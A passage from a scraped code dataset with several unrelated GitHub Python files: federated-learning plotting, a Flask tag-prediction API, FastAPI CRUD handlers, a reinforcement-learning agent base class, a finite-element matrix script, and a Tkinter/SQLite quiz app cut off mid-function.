userX[i], userY[i] = torch.tensor(userX[i],dtype=torch.float32), torch.tensor(userY[i],dtype=torch.int64)\n clf.fit(userX[i], userY[i], kl=True, teachers=buffer,pos = pos)\n if (epoch + 1) % 50 == 0:\n plot_decision_boundary(clf, X=userX[i].cpu(), Y=userY[i].cpu(), nclass=3, title=f'User {i+1} with global distillation', path=f\"./data/plot/user_KD_bound_{i+1}.pdf\", xrg=[-4.0, 4.0], yrg=[-4.0, 4.0])\n clfs_KD.append(clf)\n plt.show()\n else:\n clfs_KD = clfs\n\n avg_model = model_avg(avg_model, clients_models=clfs)\n g_avg_model = model_avg(g_avg_model, clients_models=clfs_KD)\n\n epoch += 1\n if epoch > 5:\n buffer[pos] = g_avg_model.mlp\n\n if (epoch) % 50 == 0:\n plot_decision_boundary(avg_model, X=X, Y=y, nclass=3, title=f'Global Model of FedAvg',\n path=f'./data/plot/avg_{epoch}.pdf', xrg=[-4.0, 4.0],\n yrg=[-4.0, 4.0])\n plt.show()\n\n plot_decision_boundary(g_avg_model, X=X, Y=y, nclass=3,\n title=f'Global Model with distillation',\n path=f'./data/plot/avg_KD_{epoch}.pdf', xrg=[-4.0, 4.0],\n yrg=[-4.0, 4.0])\n plt.show()\n\n\n","repo_name":"aaaaltaaaa/FederalPruneTrain","sub_path":"draw_classifier.py","file_name":"draw_classifier.py","file_ext":"py","file_size_in_byte":9120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37488330358","text":"from flask import Flask, jsonify, request\nfrom flask_cors import CORS\nimport os\nfrom joblib import dump, load\n\nmodel_path = \"models/\"\n\ntitle_models = load(model_path + 'top50_title_RidgeC_baseline.joblib')\nbody_models = load(model_path + 'top50_body_RidgeC_baseline.joblib')\ntitle_vectorizer = load(model_path + 'top50_title_vectorizer.joblib')\nbody_vectorizer = load(model_path + 'top50_body_vectorizer.joblib')\n\n\nret = {\n\t\"tags\": [\n\t\t\"tag1\",\n\t\t\"tag2\",\n\t\t\"tag3\"\n\t]\n}\n\napp = Flask(__name__)\n# CORS(app)\n@app.route('/flask/predict/', methods=['POST'])\ndef predict():\n\tdata = request.json\n\ttitle = data['title'];\n\tbody = data['body'];\n\tthreshold = data['threshold'];\n\ttv_title = title_vectorizer.transform([title])\n\ttv_body = body_vectorizer.transform([body])\n\tret = {\"tags\": []}\n\tfor k in title_models.keys():\n\t\tif(title_models[k].predict(tv_title)>threshold):\n\t\t\tret['tags'] = ret['tags'] + [k]\n\tfor k in body_models.keys():\n\t\tif(body_models[k].predict(tv_body)>threshold):\n\t\t\tret['tags'] = ret['tags'] + [k]\n\tret['tags'] = list(set(ret['tags']))\n\treturn jsonify(ret)\n\n@app.route('/flask/models/', methods=['GET'])\ndef get_models():\n\treturn jsonify({\n\t\t'title': [(k,title_models[k].alpha) for k in title_models.keys()],\n\t\t'body': [(k,body_models[k].alpha) for k in body_models.keys()],\n\t})\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"st4rsend/ml","sub_path":"ml-python/ml_20210502.py","file_name":"ml_20210502.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24125295280","text":"from fastapi import HTTPException, status\r\nfrom plans import models, schemas\r\nfrom sqlalchemy.orm import Session\r\n\r\n\r\ndef create(request: schemas.Plan ,db: Session):\r\n new_plan = models.Plan(Plan = request.Plan, Validity = request.Validity, Data = request.Data )\r\n db.add(new_plan)\r\n db.commit()\r\n db.refresh(new_plan)\r\n return request\r\n\r\n\r\ndef get_all(db: Session):\r\n plans = db.query(models.Plan).all()\r\n return plans\r\n\r\n\r\ndef show(id:int, db: Session):\r\n plan = db.query(models.Plan).filter(models.Plan.id == id).first()\r\n if not plan:\r\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND,\r\n detail= f'Blog with Validity{id} not found.')\r\n else:\r\n return plan\r\n","repo_name":"Lucifer0066/Telecom_Web_App","sub_path":"backend/app/plans/repository/plans.py","file_name":"plans.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3059859636","text":"import copy\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\n\nfrom starter_code.infrastructure.utils import from_np\nfrom starter_code.interfaces.interfaces import CentralizedOutput, TransformOutput\nfrom starter_code.rl_update.replay_buffer import StoredTransition\nfrom starter_code.organism.organism import Organism\nfrom starter_code.organism.transformations import LiteralActionTransformation\nfrom starter_code.organism.domain_specific import preprocess_state_before_store\n\nclass BaseAgent(nn.Module):\n def __init__(self, networks, args):\n super(BaseAgent, self).__init__()\n self.args = args\n self.is_subpolicy = False # default value\n self.bundle_networks(networks)\n\n def bundle_networks(self, networks):\n self.networks = networks\n\n def initialize_optimizer(self, lrs):\n self.optimizers = {}\n for name in lrs:\n self.optimizers[name] = optim.Adam(\n self.networks[name].parameters(), lr=lrs[name])\n\n def initialize_optimizer_schedulers(self, args):\n if not self.args.anneal_policy_lr: assert self.args.anneal_policy_lr_gamma == 1\n self.schedulers = {}\n for name, optimizer in self.optimizers.items():\n self.schedulers[name] = optim.lr_scheduler.StepLR(\n optimizer,\n step_size=args.anneal_policy_lr_step,\n gamma=args.anneal_policy_lr_gamma,\n last_epoch=-1)\n\n def step_optimizer_schedulers(self, pfunc):\n for name in self.schedulers:\n before_lr = self.optimizers[name].state_dict()['param_groups'][0]['lr']\n self.schedulers[name].step()\n after_lr = self.optimizers[name].state_dict()['param_groups'][0]['lr']\n\n def get_state_dict(self):\n state_dict = dict()\n for name in self.networks:\n state_dict[name] = self.networks[name].state_dict()\n for name in self.optimizers:\n state_dict['{}_optimizer'.format(name)] = self.optimizers[name].state_dict()\n return state_dict\n\n def load_state_dict(self, agent_state_dict, reset_optimizer=True):\n for name in self.networks:\n self.networks[name].load_state_dict(agent_state_dict[name])\n if not reset_optimizer:\n for name in self.optimizers:\n self.optimizers[name].load_state_dict(\n agent_state_dict['{}_optimizer'.format(name)])\n\nclass BaseRLAgent(BaseAgent, Organism):\n def __init__(self, networks, replay_buffer, args):\n BaseAgent.__init__(self, networks, args)\n self.replay_buffer = replay_buffer\n self.set_trainable(True)\n self.transformation_type = 'LiteralActionTransformation'\n\n def bundle_networks(self, networks):\n BaseAgent.bundle_networks(self, networks)\n self.policy = networks['policy']\n\n def forward(self, state, deterministic):\n with torch.no_grad():\n if isinstance(state, np.ndarray):\n state = from_np(state, 'cpu')\n action, dist_params = self.policy.select_action(state, deterministic)\n return CentralizedOutput(action=LiteralActionTransformation(action), dist_params=dist_params)\n\n def update(self, rl_alg):\n rl_alg.improve(self)\n\n def store_path(self, path):\n processed_path = []\n for step in path:\n step = preprocess_state_before_store(step)\n processed_path.append(\n StoredTransition(\n state=step.state,\n action=step.action,\n next_state=step.next_state,\n mask=step.mask,\n reward=step.reward,\n start_time=step.start_time,\n end_time=step.end_time,\n current_transformation_id=step.current_transformation_id,\n next_transformation_id=step.next_transformation_id,\n ))\n self.replay_buffer.add_path(processed_path)\n\n def clear_buffer(self):\n self.replay_buffer.clear_buffer()\n\n @property\n def discrete(self):\n return self.policy.discrete\n \n def set_trainable(self, trainable):\n self.trainable = trainable\n\n def can_be_updated(self):\n return self.trainable\n\n\nclass BaseHRLAgent(BaseRLAgent):\n def __init__(self, networks, transformations, replay_buffer, args):\n BaseRLAgent.__init__(self, networks, replay_buffer, args)\n self.transformations = self.assign_transformations(transformations)\n self.transformation_type = self.get_transformation_type(self.transformations)\n\n def assign_transformations(self, transformations):\n for t_id, transformation in transformations.items():\n transformation.set_transformation_registry(transformations) # assign pointers\n return transformations\n\n def get_transformation_type(self, transformations):\n for i, transformation in enumerate(transformations.values()):\n if i > 0:\n assert transformation.__class__.__name__ == transformation_type\n else:\n transformation_type = transformation.__class__.__name__\n return transformation_type\n\n def forward(self, state, deterministic):\n with torch.no_grad():\n if isinstance(state, np.ndarray):\n state = from_np(state, 'cpu')\n action, dist_params = self.policy.select_action(state, deterministic)\n if self.policy.discrete:\n action = self.transformations[action]\n else:\n # must be a leaf policy\n action = LiteralActionTransformation(action)\n return CentralizedOutput(action=action, dist_params=dist_params)\n\n def update(self, rl_alg):\n BaseRLAgent.update(self, rl_alg)\n for t_id, transformation in self.transformations.items():\n if transformation.can_be_updated():\n transformation.update(rl_alg)\n\n def clear_buffer(self):\n BaseRLAgent.clear_buffer(self)\n for t_id, transformation in self.transformations.items():\n transformation.clear_buffer()\n\n def visualize_parameters(self, pfunc):\n BaseRLAgent.visualize_parameters(self, pfunc)\n for t_id, transformation in self.transformations.items():\n if transformation.trainable:\n pfunc('Parameters for {}-{}'.format(transformation.__class__.__name__, t_id))\n transformation.visualize_parameters(pfunc)","repo_name":"mbchang/decentralized-rl","sub_path":"starter_code/organism/base_agent.py","file_name":"base_agent.py","file_ext":"py","file_size_in_byte":6529,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"32"} +{"seq_id":"9752751616","text":"import numpy as np\n\n# NOTE: 0-based numbering is used for counting elements and nodes. i.e. for a 2\n# element system, the elements are numbered (0,1) and the nodes are numbered\n# (0,1,2), assuming linear shape function.\n\n# Define universal constants for the problem\nmodulus = 2e8\narea = 0.001\nlength = 6\nt_l = -4e6\nb = 2e3\n\n## Example parameters\n#modulus = 4e5\n#area = 0.1\n#length = 4\n#t_l = 5\n#b = 5\n\ndef main():\n ''' For testing purposes '''\n print(global_matrices(2, 2))\n\ndef global_matrices(n_e, order=1):\n ''' Generates global stiffness matrix and force vector. n_e is the number of\n elements. Order determines the shape function (1 = linear, 2 = quadratic).'''\n # Define local parameters and matrices\n l_e = length / n_e\n K_e = local_stiffness(l_e, order)\n f_e_b = local_body_force(l_e, order)\n\n # Number of nodes in the mesh\n n_n = order * n_e + 1\n\n # generate the elemental traction force vectors (zero for all elements\n # except for the one at x=6)\n f_e_t = np.zeros((n_e, n_n))\n f_e_t[-1][-1] = area * t_l\n\n # Initiate global matrices\n K_g = np.zeros((n_n, n_n))\n f_g = np.zeros((n_n))\n\n for e in range(n_e):\n # For each element, the gather matrix is generated and then used to\n # calculate the summation term for the global matrices associated with\n # that element.\n L_e = gather_matrix(n_e, e, order)\n print(e, L_e)\n np.matmul(np.transpose(L_e), f_e_b)\n\n K_g += np.matmul(np.transpose(L_e), np.matmul(K_e, L_e))\n f_g += np.matmul(np.transpose(L_e), f_e_b) + f_e_t[e]\n\n return K_g, f_g\n\ndef gather_matrix(n_e, e, order=1):\n ''' Generates the gather matrix for element e. The matrix is an (order+1) x\n (number of nodes) matrix. '''\n L_e = np.zeros((order+1, order*n_e + 1))\n for i, row in enumerate(L_e):\n row[order*e+i] = 1\n return L_e\n\ndef local_stiffness(l_e, order=1):\n ''' Returns the appropriate local stiffness matrix given the element length\n and order '''\n if order == 1:\n return area * modulus / l_e * np.array([[1, -1], [-1, 1]])\n elif order == 2:\n return area * modulus / (3 * l_e) * np.array([\n [7, -8, 1], [-8, 16, -8], [1, -8, 7] ])\n\ndef local_body_force(l_e, order=1):\n ''' Returns the appropriate local body force vectors given the element\n length and order '''\n if order == 1:\n return b * l_e / 2 * np.array([1, 1])\n elif order==2:\n return b * l_e / 6 * np.array([1,4,1])\n\nif __name__ == '__main__':\n main()\n","repo_name":"koysean/matsci406","sub_path":"preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":2537,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"33419239901","text":"import time \nimport threading\nimport os\nimport csv\nimport re\nimport sqlite3\nimport hashlib\nfrom tkinter import *\nfrom tkinter import ttk\nfrom queue import Queue\nfrom tkinter import messagebox as ms\nwith sqlite3.connect('project1_quiz_cs384.db') as db:\n c = db.cursor()\n \nc.execute('CREATE TABLE IF NOT EXISTS project1_registration (Name TEXT NOT NULL PRIMARY KEY,password TEXT NOT NULL,Roll_No TEXT,Whatsapp_No TEXT)')\nc.execute('CREATE TABLE IF NOT EXISTS project1_marks (Roll_No TEXT NOT NULL,quiz_num TEXT NOT NULL,total_marks REAL)')\ndb.commit()\ndb.close()\n\nclass abc():\n def __init__(self):\n \t# Window \n \n self.rootabc = Tk()\n self.master=self.rootabc\n # Some Usefull variables\n self.roll=StringVar()\n self.l_roll=StringVar()\n self.whtsapp=StringVar()\n self.Name = StringVar()\n self.password = StringVar()\n self.n_username = StringVar()\n self.n_password = StringVar()\n #Create Widgets\n self.widgets()\n self.rootabc.mainloop()\n def quit(self):\n self.rootabc.destroy()\n \n #Login Function\n def login(self):\n \t#Establish Connection\n with sqlite3.connect('project1_quiz_cs384.db') as db:\n c = db.cursor()\n\n #Find project1_registration If there is any take proper action\n find_user = ('SELECT * FROM project1_registration WHERE Roll_No = ? and password = ?')\n m=c.execute(find_user,[(self.l_roll.get()),str(hashlib.sha256(self.password.get().encode('utf-8')).hexdigest())])\n \n result = c.fetchall()\n \n ###GOTO NEXT WINDOW\n if result:\n #print(\"Success\")\n self.logf.pack_forget()\n global User_Roll\n global User_Name\n User_Roll=result[0][2]\n User_Name=result[0][0]\n quiz_select(self.master)\n else:\n ms.showerror('Oops!','Some fields are either invalid or user not registered.')\n \n def new_user(self):\n \t#Establish Connection\n with sqlite3.connect('project1_quiz_cs384.db') as db:\n c = db.cursor()\n\n #Find Existing Name if any take proper action\n find_user = ('SELECT Roll_No FROM project1_registration WHERE Roll_No = ?')\n c.execute(find_user,[(self.roll.get())]) \n if c.fetchall():\n ms.showerror('Error!','Roll No Already exists.')\n else:\n ms.showinfo('Success!','Account Created!')\n self.log()\n #Create New Account \n insert = 'INSERT INTO project1_registration(Name,password,Roll_No,Whatsapp_No) VALUES(?,?,?,?)'\n c.execute(insert,[(self.n_username.get()),str(hashlib.sha256(self.n_password.get().encode('utf-8')).hexdigest()),(self.roll.get()),(self.whtsapp.get())])\n db.commit()\n\n #Frame Packing Methords\n def log(self):\n self.Name.set('')\n self.password.set('')\n self.crf.pack_forget()\n self.head['text'] = 'LOGIN'\n self.logf.pack()\n def cr(self):\n self.n_username.set('')\n self.n_password.set('')\n self.logf.pack_forget()\n self.head['text'] = 'Create Account'\n self.crf.pack()\n \n #Draw Widgets\n def widgets(self):\n self.head = Label(self.master,text = 'LOGIN',font = ('',35),pady = 10)\n self.head.pack()\n self.logf = Frame(self.master,padx =10,pady = 10)\n Label(self.logf,text = 'Roll No: ',font = ('',20),pady=5,padx=5).grid(sticky = W)\n Entry(self.logf,textvariable = self.l_roll,bd = 5,font = ('',15)).grid(row=0,column=1)\n Label(self.logf,text = 'Password: ',font = ('',20),pady=5,padx=5).grid(sticky = W)\n Entry(self.logf,textvariable = self.password,bd = 5,font = ('',15),show = '*').grid(row=1,column=1)\n Button(self.logf,text = ' Login ',bd = 3 ,font = ('',15),padx=5,pady=5,command=self.login).grid()\n Button(self.logf,text = ' Create Account ',bd = 3 ,font = ('',15),padx=5,pady=5,command=self.cr).grid(row=2,column=1)\n self.logf.pack()\n \n self.crf = Frame(self.master,padx =10,pady = 10)\n Label(self.crf,text = 'Name: ',font = ('',20),pady=5,padx=5).grid(sticky = W)\n Entry(self.crf,textvariable = self.n_username,bd = 5,font = ('',15)).grid(row=0,column=1)\n Label(self.crf,text = 'Password: ',font = ('',20),pady=5,padx=5).grid(sticky = W)\n Entry(self.crf,textvariable = self.n_password,bd = 5,font = ('',15),show = '*').grid(row=1,column=1)\n\n Label(self.crf,text = 'Roll No: ',font = ('',20),pady=5,padx=5).grid(sticky = W)\n Entry(self.crf,textvariable = self.roll,bd = 5,font = ('',15)).grid(row=2,column=1)\n Label(self.crf,text = 'Whatsapp_No: ',font = ('',20),pady=5,padx=5).grid(sticky = W)\n Entry(self.crf,textvariable = self.whtsapp,bd = 5,font = ('',15)).grid(row=3,column=1)\n\n Button(self.crf,text = 'Create Account',bd = 3 ,font = ('',15),padx=5,pady=5,command=self.new_user).grid()\n Button(self.crf,text = 'Go to Login',bd = 3 ,font = ('',15),padx=5,pady=5,command=self.log).grid(row=4,column=1)\n\n# Countdowm Function for Timer...\ndef countdown(t,Q): \n global stop_timer\n stop_timer = False\n while t: \n mins, secs = divmod(t, 60) \n timer = '{:02d}:{:02d}'.format(mins, secs)\n Q.append(timer)\n time.sleep(1) \n t -= 1\n if stop_timer:\n break\n if t == 0:\n stop_timer = True\n \n #print(\"countdown\")\n \n# Function for initial Login/Signup...\ndef login_window():\n abc()\n #print(\"login window\")\n \n# Funtion for the quiz Selection Window...\ndef quiz_select(master):\n global quiz_no\n master.destroy()\n select = Tk()\n Label(select, text = \"Choose the quiz you want to start: \\n\").pack(pady = 5, padx =10)\n \n quiz_name = StringVar()\n quiz_name.set(None)\n quizes = os.listdir(\"./quiz_wise_questions\")\n i = 0\n for num in quizes:\n R = Radiobutton(select, text = num[:-4], variable=quiz_name, value = num)\n R.pack()\n i += 1\n Button(select, text = \"OK\", command = lambda : [select.destroy(), main_quiz(quiz_name.get())]).pack(pady = 20)\n select.mainloop()\n #print(\"quiz select\")\n\n# Main Function for the Realtime Quiz... \ndef main_quiz(quiz_name):\n global ques_no\n global User_Name\n global User_Roll\n global quiz_no\n global marked\n global unatt\n global stop_timer\n quiz_no = quiz_name[:-4]\n \n quiz_window = Tk()\n #quiz_window.geometry(\"500x500\")\n\n topframe = Frame(quiz_window)\n topframe.pack(side = TOP)\n midframe = Frame(quiz_window)\n midframe.pack(side = TOP)\n mid2frame = Frame(quiz_window)\n mid2frame.pack(side = TOP)\n bottomframe = Frame(quiz_window)\n bottomframe.pack(side = BOTTOM)\n\n #Binding Parameters\n quiz_window.bind('',database_to_csv_eventpress)\n quiz_window.bind('',end_quiz_eventpress)\n quiz_window.bind('',unattempted_ques_eventpress)\n\n with open(\"./quiz_wise_questions/\" + quiz_name, 'r') as questions:\n read = csv.DictReader(questions, delimiter = ',')\n header = read.fieldnames\n list_ques = list(read)\n ques_no = 0\n q_no = []\n for x in range(len(list_ques)):\n marked.append(0)\n q_no.append(x+1)\n \n Q = []\n max_time = re.search(r'=(\\d+)', header[-1]).group(1)\n max_time = int(max_time) * 60\n t2 = threading.Thread(target=countdown, args=(max_time, Q))\n t2.start()\n \n selected_option = IntVar()\n selected_option.set(0)\n next_ques(list_ques, topframe, mid2frame, selected_option)\n Button(midframe, text = \"Save & Next\", command = lambda : next_ques(list_ques, topframe, mid2frame, selected_option)).pack(pady = 10, padx = 5, side = LEFT)\n Button(midframe, text = \"Submit\", command = lambda : end_quiz(quiz_window)).pack(pady = 10, padx = 5)\n \n var = IntVar()\n var.set(max_time)\n choice = IntVar()\n choice.set(0)\n unattempted = IntVar()\n Label(bottomframe, text = \"Time Left: \").grid(row = 0, sticky = W)\n Label(bottomframe, textvariable = var).grid(row = 0, column = 1)\n Label(bottomframe, text = \"Roll: \").grid(row = 1, sticky = W)\n Label(bottomframe, text = User_Roll).grid(row = 1, column = 1)\n Label(bottomframe, text = \"Name: \").grid(row = 2, sticky = W)\n Label(bottomframe, text = User_Name).grid(row = 2, column = 1)\n Label(bottomframe, text = \"Unattempted Questions: \").grid(row = 3, sticky = W)\n Label(bottomframe, textvariable = unattempted).grid(row = 3, column = 1)\n Label(bottomframe, text = \"Goto Question: \").grid(row = 4, sticky = W)\n ttk.Combobox(bottomframe, values = q_no, textvariable=choice, width = 5).grid(row = 4, column = 1)\n Button(bottomframe, text = \"Ok\", command = lambda : goto_ques(list_ques, topframe, mid2frame, choice.get(), selected_option)).grid(row = 4, column = 2)\n \n keys_temp = list(list_ques[0].keys())\n del(keys_temp[-1])\n keys_temp.append(\"marked_choice\")\n keys_temp.append(\"Total\")\n keys_temp.append(\"Legend\")\n with open(\"./individual_responses/\" + quiz_no + \"_\" + User_Roll + \".csv\", 'w', newline='') as indi:\n writer = csv.DictWriter(indi, fieldnames = keys_temp)\n writer.writeheader()\n \n while 1:\n if len(Q) > 0:\n var.set(Q[0])\n Q.pop()\n unattempted.set(unatt)\n try:\n quiz_window.update()\n except:\n break\n if stop_timer:\n break\n \n end_quiz(quiz_window)\n \n #print(\"main quiz\")\n\n# Function for the Save & Next Button Working...\ndef next_ques(list_ques, topframe, mid2frame, selected_option):\n global ques_no\n global total_marks\n global User_Roll\n global marked\n global unatt\n \n for widget in topframe.winfo_children():\n widget.destroy()\n \n if ques_no > 0 and len(list_ques) >= ques_no:\n marked[ques_no - 1] = int(selected_option.get())\n \n if len(list_ques) == ques_no:\n ques_no -= 1\n \n selected_option.set(marked[ques_no])\n Label(topframe, text = str(ques_no+1) + \". \" + list_ques[ques_no][\"question\"] + \"\\n\").pack(anchor = NW)\n R1 = Radiobutton(topframe, text=list_ques[ques_no][\"option1\"], variable=selected_option, value=1)\n R1.pack()\n R2 = Radiobutton(topframe, text=list_ques[ques_no][\"option2\"], variable=selected_option, value=2)\n R2.pack()\n R3 = Radiobutton(topframe, text=list_ques[ques_no][\"option3\"], variable=selected_option, value=3)\n R3.pack()\n R4 = Radiobutton(topframe, text=list_ques[ques_no][\"option4\"], variable=selected_option, value=4)\n R4.pack()\n \n Label(mid2frame, text = \"Correct Ans: \").grid(row = 0, sticky = W)\n Label(mid2frame, text = list_ques[ques_no][\"marks_correct_ans\"]).grid(row = 0, column = 1)\n Label(mid2frame, text = \"Wrong Ans: \").grid(row = 1, sticky = W)\n Label(mid2frame, text = list_ques[ques_no][\"marks_wrong_ans\"]).grid(row = 1, column = 1)\n Label(mid2frame, text = \"Is Compulsory: \").grid(row = 2, sticky = W)\n Label(mid2frame, text = list_ques[ques_no][\"compulsory\"]).grid(row = 2, column = 1)\n Label(mid2frame, text = \"\").grid(row = 3)\n \n unatt = 0\n for i in marked:\n if not i:\n unatt += 1\n ques_no += 1\n \n #print(\"next ques\")\n\n# Function for Goto Option (Called after clicking \"OK\" button)...\ndef goto_ques(list_ques, topframe, mid2frame, choice, selected_option):\n global ques_no\n global marked\n ques_no = choice - 1\n selected_option.set(marked[ques_no])\n \n for widget in topframe.winfo_children():\n widget.destroy()\n \n Label(topframe, text = str(ques_no+1) + \". \" + list_ques[ques_no][\"question\"] + \"\\n\").pack(anchor = NW)\n R1 = Radiobutton(topframe, text=list_ques[ques_no][\"option1\"], variable=selected_option, value=1)\n R1.pack()\n R2 = Radiobutton(topframe, text=list_ques[ques_no][\"option2\"], variable=selected_option, value=2)\n R2.pack()\n R3 = Radiobutton(topframe, text=list_ques[ques_no][\"option3\"], variable=selected_option, value=3)\n R3.pack()\n R4 = Radiobutton(topframe, text=list_ques[ques_no][\"option4\"], variable=selected_option, value=4)\n R4.pack()\n \n Label(mid2frame, text = \"Correct Ans: \").grid(row = 0, sticky = W)\n Label(mid2frame, text = list_ques[ques_no][\"marks_correct_ans\"]).grid(row = 0, column = 1)\n Label(mid2frame, text = \"Wrong Ans: \").grid(row = 1, sticky = W)\n Label(mid2frame, text = list_ques[ques_no][\"marks_wrong_ans\"]).grid(row = 1, column = 1)\n Label(mid2frame, text = \"Is Compulsory: \").grid(row = 2, sticky = W)\n Label(mid2frame, text = list_ques[ques_no][\"compulsory\"]).grid(row = 2, column = 1)\n Label(mid2frame, text = \"\").grid(row = 3)\n \n ques_no += 1\n \n #print(\"goto ques\")\n\n# Function for Evaluating the final parameters and putting into the csv file...\ndef evalute():\n global marked\n global total_marks\n global quiz_no\n global User_Roll\n \n i = 0\n total_quiz_marks = 0\n dict_temp = {}\n list_ques = []\n \n with open(\"./quiz_wise_questions/\" + quiz_no + \".csv\", 'r') as questions:\n read = csv.DictReader(questions, delimiter = ',')\n list_ques = list(read)\n for row in list_ques:\n total = 0\n dict_temp = row\n dict_temp.popitem()\n dict_temp[\"marked_choice\"] = marked[i]\n dict_temp[\"Total\"] = 0\n dict_temp[\"Legend\"] = \"Unanswered\"\n \n with open(\"./individual_responses/\" + quiz_no + \"_\" + User_Roll + \".csv\", 'a', newline='') as indi:\n writer = csv.DictWriter(indi, fieldnames = dict_temp.keys())\n \n if row[\"compulsory\"] == 'y':\n if int(marked[i]) == int(row[\"correct_option\"]):\n total = int(row[\"marks_correct_ans\"])\n dict_temp[\"Legend\"] = \"Correct Choice\"\n else:\n total = int(row[\"marks_wrong_ans\"])\n if int(marked[i]):\n dict_temp[\"Legend\"] = \"Wrong Choice\"\n else:\n dict_temp[\"Legend\"] = \"Wrong Choice (Unattempted)\"\n else:\n if int(marked[i]) == int(row[\"correct_option\"]):\n total = int(row[\"marks_correct_ans\"])\n dict_temp[\"Legend\"] = \"Correct Choice\"\n elif int(marked[i]):\n total = int(row[\"marks_wrong_ans\"])\n dict_temp[\"Legend\"] = \"Wrong Choice\"\n dict_temp[\"Total\"] = total\n total_marks = total_marks + total\n total_quiz_marks = total_quiz_marks + int(row[\"marks_correct_ans\"])\n writer.writerow(dict_temp)\n i += 1\n \n with open(\"./individual_responses/\" + quiz_no + \"_\" + User_Roll + \".csv\", 'a', newline='') as indi:\n writer = csv.DictWriter(indi, fieldnames = dict_temp.keys())\n for key in dict_temp:\n dict_temp[key] = \"\"\n dict_temp[\"Total\"] = total_marks\n dict_temp[\"Legend\"] = \"Marks Obtained\"\n writer.writerow(dict_temp)\n dict_temp[\"Total\"] = total_quiz_marks\n dict_temp[\"Legend\"] = \"Total Quiz Marks\"\n writer.writerow(dict_temp)\n \n #print(\"evaluate\")\n \n# Final Function for ending the quiz and the Final Result Window...\ndef end_quiz(quiz_window):\n global stop_timer\n global total_marks\n global quiz_no\n global User_Roll\n global subm_called\n \n if subm_called:\n return True\n else:\n subm_called += 1\n \n stop_timer = True\n try:\n quiz_window.destroy()\n except:\n pass\n evalute()\n subm_window = Tk()\n \n total_quiz_ques = 0\n ques_att = 0\n corr = 0\n wrong = 0\n \n with open(\"./individual_responses/\" + quiz_no + \"_\" + User_Roll + \".csv\", 'r') as indi:\n reader = csv.DictReader(indi, delimiter=',')\n \n for row in reader:\n total_quiz_ques += 1\n if row[\"Legend\"] == \"Correct Choice\":\n corr += 1\n ques_att += 1\n if row[\"Legend\"] == \"Wrong Choice\":\n wrong += 1\n ques_att += 1\n total_quiz_ques = total_quiz_ques - 2\n \n database_marks_sub()\n \n Label(subm_window, text = \"Your Quiz has been Sucessfully Submitted!\\n\").grid(row = 0)\n Label(subm_window, text = \"Total Quiz Questions: \").grid(row = 1, sticky = W)\n Label(subm_window, text = total_quiz_ques).grid(row = 1, column = 1)\n Label(subm_window, text = \"Total Quiz Questions Attempted: \").grid(row = 2, sticky = W)\n Label(subm_window, text = ques_att).grid(row = 2, column = 1)\n Label(subm_window, text = \"Total Correct Questions: \").grid(row = 3, sticky = W)\n Label(subm_window, text = corr).grid(row = 3, column = 1)\n Label(subm_window, text = \"Total Wrong Questions: \").grid(row = 4, sticky = W)\n Label(subm_window, text = wrong).grid(row = 4, column = 1)\n Label(subm_window, text = \"Total Marks Obtained: \").grid(row = 5, sticky = W)\n Label(subm_window, text = total_marks).grid(row = 5, column = 1)\n \n subm_window.mainloop()\n \n #print(\"end quiz\")\n\ndef end_quiz_eventpress(event):\n global stop_timer\n global total_marks\n global quiz_no\n global User_Roll\n \n stop_timer = True\n \n evalute()\n subm_window = Tk()\n \n total_quiz_ques = 0\n ques_att = 0\n corr = 0\n wrong = 0\n \n with open(\"./individual_responses/\" + quiz_no + \"_\" + User_Roll + \".csv\", 'r') as indi:\n reader = csv.DictReader(indi, delimiter=',')\n \n for row in reader:\n total_quiz_ques += 1\n if row[\"Legend\"] == \"Correct Choice\":\n corr += 1\n ques_att += 1\n if row[\"Legend\"] == \"Wrong Choice\":\n wrong += 1\n ques_att += 1\n total_quiz_ques = total_quiz_ques - 2\n \n Label(subm_window, text = \"Your Quiz has been Sucessfully Submitted!\\n\").grid(row = 0)\n Label(subm_window, text = \"Total Quiz Questions: \").grid(row = 1, sticky = W)\n Label(subm_window, text = total_quiz_ques).grid(row = 1, column = 1)\n Label(subm_window, text = \"Total Quiz Questions Attempted: \").grid(row = 2, sticky = W)\n Label(subm_window, text = ques_att).grid(row = 2, column = 1)\n Label(subm_window, text = \"Total Correct Questions: \").grid(row = 3, sticky = W)\n Label(subm_window, text = corr).grid(row = 3, column = 1)\n Label(subm_window, text = \"Total Wrong Questions: \").grid(row = 4, sticky = W)\n Label(subm_window, text = wrong).grid(row = 4, column = 1)\n Label(subm_window, text = \"Total Marks Obtained: \").grid(row = 5, sticky = W)\n Label(subm_window, text = total_marks).grid(row = 5, column = 1)\n \n subm_window.mainloop()\n\ndef unattempted_ques_eventpress(event):\n unattemp_ques=0\n for i in marked:\n if(i==0):\n unattemp_ques+=1\n\n #print(unattemp_ques)\n if(unattemp_ques==0):\n ms.showinfo('Unattempted Question',\"Voila ! It seems you have attempted all questions\")\n else:\n ms.showinfo('Unattempted Question',\"You still havn't attempted \"+str(unattemp_ques)+\" questions\")\n\ndef database_marks_sub():\n with sqlite3.connect('project1_quiz_cs384.db') as db:\n c = db.cursor()\n find_user_already_sub = ('SELECT Roll_No FROM project1_marks WHERE Roll_No = ? AND quiz_num = ?')\n c.execute(find_user_already_sub,[User_Roll,quiz_no])\n if c.fetchall():\n #ms.showerror('Error!','Roll No has already given the quiz.')\n #print(\"Already Submitted once but now it is modified\")\n ft = ('DELETE FROM project1_marks WHERE Roll_No = ? AND quiz_num = ?')\n c.execute(ft,[User_Roll,quiz_no])\n db.commit()\n insert = 'INSERT INTO project1_marks(Roll_No,quiz_num,total_marks) VALUES(?,?,?)'\n c.execute(insert,[User_Roll,quiz_no,total_marks])\n db.commit()\n database_to_csv()\n \n else:\n #print(\"FIRST TIME QUIZ SUBMISSION\")\n insert = 'INSERT INTO project1_marks(Roll_No,quiz_num,total_marks) VALUES(?,?,?)'\n 